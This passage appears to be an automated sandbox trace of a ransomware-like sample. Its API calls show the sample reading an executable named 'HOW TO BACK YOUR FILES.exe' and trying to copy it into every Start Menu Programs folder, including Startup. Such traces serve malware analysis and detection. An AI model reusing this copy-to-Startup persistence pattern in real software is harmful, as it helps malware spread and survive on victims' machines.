data\\application data\\application data\\start menu\\programs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.707] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.708] GetLastError () returned 0x0 [0090.708] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.708] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.708] CloseHandle (hObject=0x120) returned 1 [0090.708] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.709] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x59599720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59599720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.709] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC" [0090.709] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC" [0090.709] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.709] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\start menu\\programs\\tablet pc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.710] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.710] GetLastError () returned 0x0 [0090.710] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.710] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.710] CloseHandle (hObject=0x120) returned 1 [0090.710] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.711] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Tablet PC\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9182055d, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x4bb59600, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4bb59600, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.711] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Startup", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Startup") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Startup" [0090.711] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Startup" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Startup") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Startup" [0090.711] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.711] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Startup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\start menu\\programs\\startup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.711] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.712] GetLastError () returned 0x0 [0090.712] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.712] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.712] CloseHandle (hObject=0x120) returned 1 [0090.712] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.712] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x595bf880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x595bf880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.712] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint" [0090.712] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint" [0090.712] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.713] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\start menu\\programs\\sharepoint\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.713] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.713] GetLastError () returned 0x0 [0090.713] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.713] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.713] CloseHandle (hObject=0x120) returned 1 [0090.714] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.714] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\SharePoint\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78038410, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x595e59e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x595e59e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.714] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office" [0090.714] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office" [0090.714] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.714] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\start menu\\programs\\microsoft office\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.715] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.715] GetLastError () returned 0x0 [0090.715] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.715] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.715] CloseHandle (hObject=0x120) returned 1 [0090.715] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.715] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77f53bd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x596f0380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x596f0380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.715] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools" [0090.716] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools" [0090.716] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.716] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.716] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.716] GetLastError () returned 0x0 [0090.716] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.716] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.717] CloseHandle (hObject=0x120) returned 1 [0090.717] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.717] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77f53bd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x59788900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59788900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.717] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance" [0090.717] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance" [0090.717] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.717] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\start menu\\programs\\maintenance\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.718] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.718] GetLastError () returned 0x0 [0090.718] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.718] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.718] CloseHandle (hObject=0x120) returned 1 [0090.718] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.718] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9dbcac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x597fad20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x597fad20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.719] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Java", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Java") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Java" [0090.719] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Java" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Java") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Java" [0090.719] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.719] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Java\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\start menu\\programs\\java\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.719] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.720] GetLastError () returned 0x0 [0090.720] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.720] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.720] CloseHandle (hObject=0x120) returned 1 [0090.720] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.720] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Java\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7577bc60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x59b66cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59b66cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.720] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Games", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Games") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Games" [0090.720] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Games" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Games") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Games" [0090.720] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.720] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Games\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\start menu\\programs\\games\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.721] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.721] GetLastError () returned 0x0 [0090.721] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.721] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.721] CloseHandle (hObject=0x120) returned 1 [0090.721] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.721] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Games\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x59c4b500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x59c4b500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.722] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools" [0090.722] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools" [0090.722] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.722] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\start menu\\programs\\administrative tools\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.722] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.723] GetLastError () returned 0x0 [0090.723] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.723] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.723] CloseHandle (hObject=0x120) returned 1 [0090.723] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.723] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Administrative Tools\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5a0298c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5a0298c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.723] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Start Menu\\Programs\\Accessories", iMaxLength=260 | out: 